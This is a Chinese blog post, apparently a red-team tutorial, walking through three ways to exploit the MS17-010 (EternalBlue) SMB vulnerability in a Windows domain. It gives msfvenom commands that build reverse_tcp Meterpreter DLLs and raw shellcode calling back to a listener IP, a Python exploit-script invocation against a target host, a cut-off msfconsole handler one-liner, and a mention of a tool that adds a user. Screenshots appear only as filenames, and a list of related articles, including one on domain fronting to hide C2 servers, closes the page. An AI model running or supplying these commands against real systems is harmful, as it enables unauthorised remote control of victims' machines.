域渗透|浅谈MS17010多种打法(二)

简介: 域渗透|浅谈MS17010多种打法

利用一

NSA原版MS17-010

记得metasploit开启监听

#metasploit生成dll文件
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=9999 -f dll > winx64.dll    
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=9999 -f dll > winx86.dll

1.检查MS17010

990b07a18396d585be094c0bebfb5b5f_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

2.攻击

def2e475246fb402334724733f706d7e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

a5836f36f9decd3c54723d1c90919da1_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

3.漏洞利用

faacdaf57a2ead610bde1fe232cad028_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

39b187f7c6ab17932324e41067dd3183_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

metasploit上线

293ca8804b26a13e5d8aff4d856d4f22_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

利用二

K8哥哥的ksmb.exe

3c42502362b7feaa5d5302acbd607e4b_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

成功添加用户

b4608ca303289d817dd958d0b5b33c44_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

利用三

https://blackwolfsec.cc/2017/05/12/Eternalblue_ms17-010/

需要多次利用才能成功

#生成shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.18 LPORT=1111 -f raw > shellcode
#利用
python3 ms17-010.py --host 192.168.0.28 --file shellcode

加上--port 445会报错

1.攻击

5c891fa3db586c34089571e959a65309_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

2.监听后成功上线

#一键启动监听
msfconsole -x "use exploit/multi/handler; set payload windows/x64/meterpreter/revers

c2087f8d4f68c799502541f553dda370_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

相关文章
|
网络协议 网络安全 CDN
「红队建设」Domain Fronting隐藏C2服务器技术
「红队建设」Domain Fronting隐藏C2服务器技术
|
安全 网络安全 Windows
域渗透|浅谈MS17010多种打法(一)
域渗透|浅谈MS17010多种打法
579 0
域渗透|浅谈MS17010多种打法(一)
|
数据管理 测试技术
多域MDM与多个域MDM:区别比你想象的要大
最近,出现了一种新的MDM趋势,供应商开始部署预构建的单域应用程序(例如,客户MDM、产品MDM等),声称通过这些应用程序的组合提供了真正的多域MDM功能。
|
网络协议 大数据 5G
大连接时代到来的十大标志之一:用户、战略与网络基础建设
根据中国互络信息中心近日发布的《中国互联网络发展状况统计报告》显示,截至2016年12月,我国网民规模达7.31亿,2016年共计新增网民4299万人,互联网普及率达到53.2%。在这组数据中,手机网民占比达6.95亿,因为老人与儿童可能不会操作PC,但用手机和平板上网则相对容易。
178 0
大连接时代到来的十大标志之一:用户、战略与网络基础建设
|
人工智能 物联网 大数据
大连接时代到来的十大标志之二:连接战略已成企业共识
12月20日,中国移动宣布全面实施大连接战略,高通、华为、大唐移动等一众实力企业都为其站台,表示会全力支持其大连接战略。中移动全面启动连接战略,意味着运营商乃至整个通信产业接下来都会在连接上下功夫。运营商的发力,自然会带动更多的行业加入其中,能让更多产业快速连接互联网。
155 0